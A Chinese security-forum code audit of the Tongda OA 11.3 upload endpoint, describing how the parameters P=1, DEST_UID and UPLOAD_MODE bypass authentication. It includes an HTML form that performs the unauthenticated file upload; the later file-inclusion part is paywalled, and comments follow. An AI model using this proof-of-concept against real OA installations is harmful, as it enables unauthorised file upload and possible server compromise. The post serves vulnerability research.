通达OA11.3--代码审计

xzz   ·   发表于 2024-01-18 17:55:33   ·   代码审计

1、文件上传配合文件包含

  1. 文件上传首先确定存在漏洞的文件。和文件上传相关的函数比如upload。在从上到下分析构造的条件

  1. 1. POST 请求中提取变量 P 的值。
  2. 2. 检查 P 是否已设置且不为空字符串。
  3. 3. 如果 P 已设置且非空,进入包含 "inc/session.php" 文件,然后设置会话 ID P,启动一个会话
  4. 4. 如果 P 未设置或为空,则包含 "auth.php" 文件。

  1. post提交获取TYPEDEST_UID
  2. DEST_UID=0就报错结束,不满足0就可以

  1. 有文件上传值大于等于1就会进入文件上传代码
  2. upload不在第一个if,所以满不满足1都可以,都会执行。
  3. 如果没有检测到文件上传就提示,检测到就进if判断
  4. 判断文件大小可以控制

  1. 选择输出内容的模式

  1. 过滤是在upload里,过滤了后缀、文件名、大小等还有类名单验证
  2. 构造请求条件,要构造上传文件的表单

  1. P=1 未授权
  2. DEST_UID=1 进入逻辑
  3. UOLOAD_MODE=1,2,3选择输出内容的模式
  4. ATTACHMENT 就收文件上传的参数名
  1. 构造表单去触发upload文件比较快捷。
  1. <html>
  2. <body>
  3. <form action="http://127.0.0.1/ispirit/im/upload.php" method="post" enctype="multipart/form-data">
  4. <input type="text"name="P" value=1></input>
  5. <input type="text"name="UPLOAD_MODE" value=1></input>
  6. <input type="text" name="DEST_UID" value=1></input>
  7. <input type="file" name="ATTACHMENT"></input>
  8. <input type="submit" ></input>
  9. </body>
  10. </html>
更多内容已被隐藏
主题内容你需要付费可见 (点击购买) 售价:1 金币
用户名金币积分时间理由
Track-魔方 400.00 0 2024-01-22 15:03:03 深度 100 普适 200 可读 100

打赏我,让我更有动力~

6 条回复   |  直到 11个月前 | 639 次浏览

Track-魔方
发表于 11个月前

这是啥:

为啥前面是代码审计,后面又成了漏洞复现了呢,如果按照漏洞复现来算,这些漏洞就不在平台收录范围了

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 11个月前

代码里面还是有些特殊字符编码或者干扰了,需要再稍微检查修正修正就行:

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 11个月前

代码框里面的东西都在检查检查吧

评论列表

  • 加载数据中...

编写评论内容

17828147368
发表于 11个月前

这个会不会太老了

评论列表

  • 加载数据中...

编写评论内容

30118
发表于 11个月前

我瞅瞅

评论列表

  • 加载数据中...

编写评论内容

学kali的小白
发表于 11个月前

|| 这是或者的意思哦

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.